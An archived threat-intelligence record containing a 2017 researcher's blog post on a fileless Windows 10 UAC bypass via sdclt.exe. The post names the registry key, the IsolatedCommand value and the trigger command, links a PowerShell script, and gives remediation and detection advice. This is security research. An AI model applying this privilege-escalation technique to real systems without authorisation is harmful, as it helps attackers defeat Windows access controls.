{
	"id": "549de05a-5402-485f-a3c2-c06f98dfea4e",
	"created_at": "2026-04-06T00:06:58.950527Z",
	"updated_at": "2026-04-10T03:31:17.784258Z",
	"deleted_at": null,
	"sha1_hash": "18d43d2b04a4efc38eb518de747dc704c6c17daa",
	"title": "“Fileless” UAC Bypass using sdclt.exe",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 811164,
	"plain_text": "“Fileless” UAC Bypass using sdclt.exe\r\nPublished: 2017-03-17 · Archived: 2026-04-05 15:28:13 UTC\r\nRecently, I published a post on using App Paths with sdclt.exe to bypass UAC. You may remember that the App\r\nPath bypass required a file on disk. Since sdclt.exe is out there, I figured I would publish another bypass using that\r\nbinary, only this one is fileless. I mentioned it in my previous post, but the Vault7 leak confirms that bypassing\r\nUAC is operationally interesting, even to nation states, as several UAC bypasses/notes were detailed in the dump.\r\nAs far as public bypasses go, definitely check out the UACME project by @hfiref0x, which has a nice collection\r\nof public techniques.\r\nIn newer versions of Windows, Microsoft has shown that they are taking the bypasses seriously. This has\r\nmotivated me to spend a little more time on UAC and the different methods around it.\r\nAs some of you may know, there are some Microsoft signed binaries that auto-elevate due to their manifest. You\r\ncan read more about these binaries and their manifests here. While searching for more of these auto-elevating\r\nbinaries by using the SysInternals tool “sigcheck“, I came across “sdclt.exe” and verified that it auto-elevates due\r\nto its manifest:\r\n*Note: This only works on Windows 10. The manifest for sdclt.exe in Windows 7 has the requestedExecutionLevel\r\nset to “AsInvoker”, preventing auto-elevation when started from medium integrity.\r\nAs I mentioned in my last post, a common technique used to investigate loading behavior on Windows is to use\r\nSysInternals Process Monitor to analyze how a process behaves when executed. I often work some basic binary\r\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\r\nPage 1 of 5\n\nanalysis into my investigative process in order to see what other opportunities exist.\r\nOne of the first things I tend to do when analyzing an auto-elevate binary is to look for any potential command\r\nline arguments. I use IDA for this, but you can use your preferred tool. When peering into sdclt.exe, I noticed a\r\nfew arguments that stood out due to interesting keywords:\r\nThese were interesting as sdclt.exe is set to auto-elevate in its manifest anyway. Looking at sdclt.exe in IDA, it\r\nchecks if the argument matches “/kickoffelev”. If it does, it sets the full path for “sdclt.exe”, adds “/KickOffJob”\r\nas a parameter and then calls SxShellExecuteWithElevate.\r\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\r\nPage 2 of 5\n\nFollowing that path, SxShellExecuteWithElevate starts “%systemroot%\\system32\\sdclt.exe /kickoffjob” with the\r\n“Runas” verb. This is essentially programmatically executing the “RunAsAdministrator” option when you right-click a binary.\r\nThe next step is to run “sdclt.exe /Kickoffelev” with procmon running. After going through the output, we see the\r\ntrusty “shell\\\u003cverb\u003e\\command” registry search path in the HKEY_CURRENT_USER hive.\r\nThe next step was to add those keys and see if our binary and parameters of choice would execute. Unfortunately,\r\nnothing executed after adding the keys and starting “sdclt.exe /kickoffelev”. Looking back in procmon, our keys\r\nare queried, but sdclt.exe is actually looking for an additional value within the “command” key:\r\n“IsolatedCommand”.\r\nWe can then add our payload and parameters in a string (REG_SZ) value within the “Command” key called\r\n“IsolatedCommand”:\r\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\r\nPage 3 of 5\n\nThis is the same bug (minus the IsolatedCommand portion) that was used in the eventvwr.exe “fileless” UAC\r\nbypass. You can read about the eventvwr.exe bypass and the specific registry keys used here. Notice that instead\r\nof “shell\\open\\command”, we now see “shell\\runas\\command”. This is because sdclt.exe was invoked (again)\r\nusing the “RunAs” verb via SxShellExecuteWithElevate.\r\nAfter adding our payload as the “IsolatedCommand” value, running “sdclt.exe /KickOffElev” will execute our\r\npayload (and any parameters) in a high-integrity context:\r\nTo demonstrate this technique, you can find a script here: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1\r\nThe script takes a full path to your payload and any parameters. “C:\\Windows\\System32\\cmd.exe /c notepad.exe”\r\nis a good one to validate. It will automatically add the keys, start “sdclt.exe /kickoffelev” and then cleanup.\r\nThis particular technique can be remediated or fixed by setting the UAC level to “Always Notify” or by removing\r\nthe current user from the Local Administrators group. Further, if you would like to monitor for this attack, you\r\ncould utilize methods/signatures to look for and alert on new registry entries in\r\nHKCU:\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand\r\nCheers,\r\nMatt\r\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\r\nPage 4 of 5\n\nSource: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\r\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/"
	],
	"report_names": [
		"fileless-uac-bypass-using-sdclt-exe"
	],
	"threat_actors": [
		{
			"id": "23dfc9f5-1862-4510-a6ae-53d8e51f17b1",
			"created_at": "2024-05-01T02:03:08.146025Z",
			"updated_at": "2026-04-10T02:00:03.67072Z",
			"deleted_at": null,
			"main_name": "PLATINUM TERMINAL",
			"aliases": [
				"APT-C-39 ",
				"Longhorn ",
				"The Lamberts ",
				"Vault7 "
			],
			"source_name": "Secureworks:PLATINUM TERMINAL",
			"tools": [
				"AfterMidnight",
				"Assassin",
				"Marble Framework"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434018,
	"ts_updated_at": 1775791877,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18d43d2b04a4efc38eb518de747dc704c6c17daa.pdf",
		"text": "https://archive.orkl.eu/18d43d2b04a4efc38eb518de747dc704c6c17daa.txt",
		"img": "https://archive.orkl.eu/18d43d2b04a4efc38eb518de747dc704c6c17daa.jpg"
	}
}